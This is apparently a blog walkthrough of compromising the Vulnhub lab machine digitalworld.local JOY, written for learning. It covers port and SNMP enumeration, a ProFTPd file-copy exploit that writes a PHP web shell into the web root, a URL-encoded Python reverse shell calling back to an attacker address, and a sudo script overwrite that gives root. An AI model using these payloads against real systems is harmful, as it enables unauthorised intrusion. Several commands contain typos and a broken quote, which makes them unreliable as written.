Vulnhub | digitalworld.local - JOY

In this post, we look at the steps I took to fully compromise the Joy host in the Digital World series.

8 months ago   •   10 min read

By 0xBEN
Table of contents

Nmap Scan

# Nmap 7.91 scan initiated Thu Sep 23 16:48:06 2021 as: nmap -T4 -p- -A -oA scan-advanced 10.9.9.24  
Nmap scan report for JOY.cyber.range (10.9.9.24)  
Host is up (0.00034s latency).  
Not shown: 65523 closed ports  
PORT    STATE SERVICE     VERSION  
21/tcp  open  ftp  
| fingerprint-strings:    
|   GenericLines:    
|     220 The Good Tech Inc. FTP Server  
|     Invalid command: try being more creative  
|_    Invalid command: try being more creative  
22/tcp  open  ssh         Dropbear sshd 0.34 (protocol 2.0)  
25/tcp  open  smtp        Postfix smtpd  
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPU  
TF8,    
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))  
| http-ls: Volume /  
| SIZE  TIME              FILENAME  
| -     2016-07-19 20:03  ossec/  
|_  
|_http-server-header: Apache/2.4.25 (Debian)  
|_http-title: Index of /  
110/tcp open  pop3        Dovecot pop3d  
|_pop3-capabilities: SASL RESP-CODES TOP STLS CAPA AUTH-RESP-CODE PIPELINING UIDL  
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG  
| Not valid before: 2019-01-27T17:23:23  
|_Not valid after:  2032-10-05T17:23:23  
|_ssl-date: TLS randomness does not represent time  
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)  
143/tcp open  imap        Dovecot imapd  
|_imap-capabilities: have listed ID SASL-IR more STARTTLS LITERAL+ capabilities Pre-login IMAP4rev1 ENABLE LOGIN-REFERRALS p  
ost-login LOGINDISABLEDA0001 IDLE OK  
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG  
| Not valid before: 2019-01-27T17:23:23  
|_Not valid after:  2032-10-05T17:23:23  
|_ssl-date: TLS randomness does not represent time  
445/tcp open  netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)  
465/tcp open  smtp        Postfix smtpd  
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPU  
TF8,    
587/tcp open  smtp        Postfix smtpd  
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPU  
TF8,    
993/tcp open  ssl/imap    Dovecot imapd  
|_imap-capabilities: listed ID SASL-IR more have LITERAL+ Pre-login capabilities IMAP4rev1 ENABLE LOGIN-REFERRALS post-login  
AUTH=PLAINA0001 IDLE OK  
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG  
| Not valid before: 2019-01-27T17:23:23  
|_Not valid after:  2032-10-05T17:23:23  
|_ssl-date: TLS randomness does not represent time  
995/tcp open  ssl/pop3    Dovecot pop3d  
|_pop3-capabilities: SASL(PLAIN) RESP-CODES TOP USER CAPA AUTH-RESP-CODE PIPELINING UIDL  
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG  
| Not valid before: 2019-01-27T17:23:23  
|_Not valid after:  2032-10-05T17:23:23  
|_ssl-date: TLS randomness does not represent time  
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at h  
ttps://nmap.org/cgi-bin/submit.cgi?new-service :  
SF-Port21-TCP:V=7.91%I=7%D=9/23%Time=614CE813%P=x86_64-pc-linux-gnu%r(Gene  
SF:ricLines,7F,"220\x20The\x20Good\x20Tech\x20Inc\.\x20FTP\x20Server\r\n50  
SF:0\x20Invalid\x20command:\x20try\x20being\x20more\x20creative\r\n500\x20  
SF:Invalid\x20command:\x20try\x20being\x20more\x20creative\r\n");  
Device type: general purpose  
Running: Linux 3.X  
OS CPE: cpe:/o:linux:linux_kernel:3.13  
OS details: Linux 3.13  
Network Distance: 2 hops  
Service Info: Hosts:  JOY.localdomain, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel  
  
Host script results:  
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: -1s  
|_nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)  
| smb-os-discovery:    
|   OS: Windows 6.1 (Samba 4.5.12-Debian)  
|   Computer name: joy  
|   NetBIOS computer name: JOY\x00  
|   Domain name: \x00  
|   FQDN: joy  
|_  System time: 2021-09-24T04:48:38+08:00  
| smb-security-mode:    
|   account_used: guest  
|   authentication_level: user  
|   challenge_response: supported  
|_  message_signing: disabled (dangerous, but default)  
| smb2-security-mode:    
|   2.02:    
|_    Message signing enabled but not required  
| smb2-time:    
|   date: 2021-09-23T20:48:38  
|_  start_date: N/A  
  
TRACEROUTE (using port 3306/tcp)  
HOP RTT     ADDRESS  
1   0.24 ms pfSense.cyber.range (10.0.0.1)  
2   0.39 ms JOY.cyber.range (10.9.9.24)  
  
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  
# Nmap done at Thu Sep 23 16:52:35 2021 -- 1 IP address (1 host up) scanned in 270.14 seconds




Service Enumeration

FTP

target=10.9.9.24
ftp $target

Connected to 10.9.9.24.
220 The Good Tech Inc. FTP Server
Name (10.9.9.24:ben): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.

Entered a junk value as the password and was able to login anonymously. There are a upload and a download folder. I have read and write access to both.

I use mget to download everything in the upload directory. Unfortunately, all of the files are useless and contain nothing but junk.





SMB

No anonymous login allowed.





HTTP

Try enumerating some files and directories with gobuster, but find nothing.





SMTP

nc $target 25

220 JOY.localdomain ESMTP Postfix (Debian/GNU)  
VRFY patrick@JOY.localdomain  
252 2.0.0 patrick@JOY.localdomain  
VRFY doesnotexist@JOY.localdomain  
550 5.1.1 <doesnotexist@JOY.localdomain>: Recipient address rejected: User unknown in local recipient table

Check searchsploit for any information about the service. I am able to very a user account, but don't see a viable path forward here.





UDP Scan

I exhausted all my efforts on the services running on TCP, so I decide to have a look at UDP.

sudo nmap -T4 -sU --top-ports 50 $target

123/udp  open          ntp  
137/udp  open|filtered netbios-ns  
138/udp  open|filtered netbios-dgm  
161/udp  open|filtered snmp  
631/udp  open|filtered ipp  
1900/udp open|filtered upnp  
5353/udp open|filtered zeroconf

I see snmp in the list and that has a lot of promise for further enumeration. Run all snmp-* scans against the target that will not break the service.

sudo nmap -p161 -sU --script "(not vuln and not intrusive and not malware and not dos and not exploit and not fuzzer) and snmp-*" $target > snmp-output

There is a lot of output, so I will only focus on the interesting stuff.

688:   
|     Name: in.tftpd  
|     Path: /usr/sbin/in.tftpd  
|     Params: --listen --user tftp --address 0.0.0.0:36969 --secure /home/patrick

The tftpd daemon is serving the /home/patrick directory. /home/patrick is the same folder that was being served in FTP. I start downloading some files and take a look.

The version_control file has some interesting stuff in it.

cat version_control           

Version Control of External-Facing Services:

Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12

We should switch to OpenSSH and upgrade ProFTPd.

Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.




Exploit

Anonymous login on the FTP service exposed information about user's directory structure. Combined with information gathered from TFTP service, I was able to:

  • Identify a vulnerable version of proftpd
  • Identify the web root directory which was writable by the FTP service

searchsploit shows the 49908.py exploit should work on this version of ProFTPd. Modify the exploit to generate a web shell.

We do site cpfr /proc/self/cmdling to create a fake file with site cpto <?php echo passthru($_GET['cmd']); ?>. Then, copy our fake file to /var/www/tryingharderisjoy/pwn.php. This causes the web server to parse the PHP script.

The $_GET['cmd'] syntax means the PHP page takes input from the user 'cmd' is the paramter name. You could use any parameter name here like $_['mycommand'], it's just a parameter name.

You can see that I can now go to pwn.php and pass the ?cmd= parameter pass through the command to the underlying system.

curl http://$target/pwn.php?cmd=id
An example of code execution through a web shell

I encode a Python payload to get the web shell to execute a reverse shell on the target.

python%20-c%20%27import%20socket,subprocess,os;s%3Dsocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.0.0.2%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22,%22-i%22%5D);%27




Post-Exploitation

Environment

Current User

id
uid=33(www-data) gid=33(www-data) groups=33(www-data),123(ossec)

sudo -v
Sorry, user www-data may not run sudo on JOY.




OS and Kernel

cat /etc/*release

PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
NAME="Debian GNU/Linux"
VERSION_ID="9"
VERSION="9 (stretch)"
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

uname -a

Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux




Users and Groups

cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
rtkit:x:105:110:RealtimeKit,,,:/proc:/bin/false
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
geoclue:x:109:115::/var/lib/geoclue:/bin/false
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
pulse:x:111:116:PulseAudio daemon,,,:/var/run/pulse:/bin/false
avahi:x:112:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:113:120:colord colour management daemon,,,:/var/lib/colord:/bin/false
saned:x:114:121::/var/lib/saned:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:116:122:Gnome Display Manager:/var/lib/gdm3:/bin/false
patrick:x:1000:1000:patrick,,,:/home/patrick:/bin/bash
ossec:x:117:123::/var/ossec/:/bin/false
ossecm:x:118:123::/var/ossec/:/bin/false
ossecr:x:119:123::/var/ossec/:/bin/false
mysql:x:120:125:MySQL Server,,,:/nonexistent:/bin/false
ntp:x:121:126::/home/ntp:/bin/false
Debian-snmp:x:122:127::/var/lib/snmp:/bin/false
ftp:x:1001:1001::/home/ftp:/bin/false
tftp:x:123:128:tftp daemon,,,:/srv/tftp:/bin/false
postfix:x:124:129::/var/spool/postfix:/bin/false
dovecot:x:125:131:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:126:132:Dovecot login user,,,:/nonexistent:/bin/false


cat /etc/group

root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:patrick
floppy:x:25:patrick
tape:x:26:
sudo:x:27:
audio:x:29:pulse,patrick
dip:x:30:patrick
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:patrick
sasl:x:45:
plugdev:x:46:patrick
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
systemd-journal:x:101:
systemd-timesync:x:102:
systemd-network:x:103:
systemd-resolve:x:104:
systemd-bus-proxy:x:105:
input:x:106:
crontab:x:107:
netdev:x:108:patrick
ssl-cert:x:109:
rtkit:x:110:
messagebus:x:111:
ssh:x:112:
bluetooth:x:113:patrick
lpadmin:x:114:patrick
geoclue:x:115:
pulse:x:116:
pulse-access:x:117:
scanner:x:118:saned,patrick
avahi:x:119:
colord:x:120:
saned:x:121:
Debian-gdm:x:122:
patrick:x:1000:
ossec:x:123:www-data
sambashare:x:124:
mysql:x:125:
ntp:x:126:
Debian-snmp:x:127:
ftp:x:1001:patrick
tftp:x:128:
postfix:x:129:
postdrop:x:130:
dovecot:x:131:
dovenull:x:132:




Scheduled Tasks

None.





Interesting Files

The /home/patrick/haha directory is globally rwx





Privilege Escalation

I found a credential for the patrick user in /var/www/tryingharderisjoy/ossec/patricksecretsofjoy. I move laterally over the patrick account.

Patrick has these sudo privileges: (ALL) NOPASSWD: /home/patrick/script/test. Taking a look at the script, it asks the user for a file in the script's working directory. It will set permissions on the file in the directory.

The script does not do any input validation. So, I run sudo /home/patrick/script/test. When prompted for input, I just press the Enter key and do not provide any input. This causes the script to change the permissions on the entire script directory. This causes the script to become writeable.

I can now overwrite the script with my own contents.

echo '#!/bin/bash' > ~/script/test
echo bash -ip' >> ~/script/test

I run the script once more, sudo ~/script/test...

id
uid=0(root) gid=0(root) groups=0(root)

root@JOY:/home/patrick/script#

root.txt

cat proof.txt
Never grant sudo permissions on scripts that perform system functions!
root@JOY:~# 

Spread the word

Keep reading